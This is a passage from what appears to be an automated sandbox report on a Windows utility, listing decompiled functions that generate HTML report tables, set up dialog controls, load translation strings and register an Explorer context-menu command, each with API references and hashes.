				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

APIs

memset.MSVCRT ref: 0040AEB2
memset.MSVCRT ref: 0040AEC7
wcscpy.MSVCRT ref: 0040AEF9
_snwprintf.MSVCRT ref: 0040AF19
wcscat.MSVCRT ref: 0040AF26
_snwprintf.MSVCRT ref: 0040AF55
wcscat.MSVCRT ref: 0040AF62
wcscat.MSVCRT ref: 0040AF70
wcscat.MSVCRT ref: 0040AF82
wcscat.MSVCRT ref: 0040AF8D
wcscat.MSVCRT ref: 0040AF9F
wcscat.MSVCRT ref: 0040AFB1

Strings

color="#%s", xrefs: 0040AF44
</b>, xrefs: 0040AF99
<font, xrefs: 0040AEF3
<b>, xrefs: 0040AF7C
</font>, xrefs: 0040AFAB
size="%d", xrefs: 0040AF08

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}

APIs

Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34

DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
GetDlgItem.USER32 ref: 00403C2F
SetWindowLongW.USER32 ref: 00403C39

Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16

GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
LoadImageW.USER32 ref: 00403C6A
GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
LoadImageW.USER32 ref: 00403C7F
SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
GetDlgItem.USER32 ref: 00403CB0

Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

GetDlgItem.USER32 ref: 00403CC2
GetDlgItem.USER32 ref: 00403CD4

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

GetDlgItem.USER32 ref: 00403D64
GetDlgItem.USER32 ref: 00403DC0
GetDlgItem.USER32 ref: 00403DF0
GetDlgItem.USER32 ref: 00403E20
GetDlgItem.USER32 ref: 00403E4F
SendDlgItemMessageW.USER32 ref: 00403E87
GetDlgItem.USER32 ref: 00403E9B
SetFocus.USER32(00000000), ref: 00403E9E

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
String ID:
API String ID: 1038210931-0
Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}

APIs

memset.MSVCRT ref: 00407784
memset.MSVCRT ref: 004077AE
memset.MSVCRT ref: 004077C4
memset.MSVCRT ref: 004077DA
_snwprintf.MSVCRT ref: 00407813
wcscpy.MSVCRT ref: 0040785E
_snwprintf.MSVCRT ref: 004078EB
wcscat.MSVCRT ref: 0040791D

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

wcscpy.MSVCRT ref: 004078FF
_snwprintf.MSVCRT ref: 0040795C

Strings

</table><p>, xrefs: 00407980
<table border="1" cellpadding="5">, xrefs: 0040781B
 , xrefs: 00407917
<font color="%s">%s</font>, xrefs: 004078DE
nowrap, xrefs: 00407858
bgcolor="%s", xrefs: 00407805
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040778C

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

APIs

memset.MSVCRT ref: 00407B83
memset.MSVCRT ref: 00407B98
memset.MSVCRT ref: 00407BAD
_snwprintf.MSVCRT ref: 00407BDC
_snwprintf.MSVCRT ref: 00407C0B
wcscpy.MSVCRT ref: 00407C1C
_snwprintf.MSVCRT ref: 00407C3C
memset.MSVCRT ref: 00407C7B
_snwprintf.MSVCRT ref: 00407C9C
_snwprintf.MSVCRT ref: 00407CD6

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

Strings

width="%s", xrefs: 00407C8B
<table border="1" cellpadding="5"><tr%s>, xrefs: 00407C2B
<th%s>%s%s%s, xrefs: 00407CC5
<font color="%s">, xrefs: 00407BFA
bgcolor="%s", xrefs: 00407BCB
</font>, xrefs: 00407C16

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124
registryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}

APIs

memset.MSVCRT ref: 00404452
_snwprintf.MSVCRT ref: 00404473

Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC

RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB

Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
memset.MSVCRT ref: 004044CF

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

GetDriveTypeW.KERNEL32(?), ref: 00404518
memset.MSVCRT ref: 00404539
memset.MSVCRT ref: 0040454E
_snwprintf.MSVCRT ref: 00404571
_snwprintf.MSVCRT ref: 0040458A

Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57

Strings

C:\, xrefs: 004044F1
"%s",0, xrefs: 0040457D
%s\shell\%s\command, xrefs: 00404462
:, xrefs: 004044E3
%s\shell\%s, xrefs: 00404564

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
API String ID: 486436031-734527199
Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}

APIs

memset.MSVCRT ref: 00406484
memset.MSVCRT ref: 004064A0

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128

wcscpy.MSVCRT ref: 004064E4
wcscpy.MSVCRT ref: 004064F3
wcscpy.MSVCRT ref: 00406503
EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
wcscpy.MSVCRT ref: 0040657A

Strings

Version, xrefs: 00406536
general, xrefs: 004064F8
strings, xrefs: 00406574
TranslatorURL, xrefs: 00406520
SFM, xrefs: 00406502
RTL, xrefs: 00406549
TranslatorName, xrefs: 0040650F

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2314623505
Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
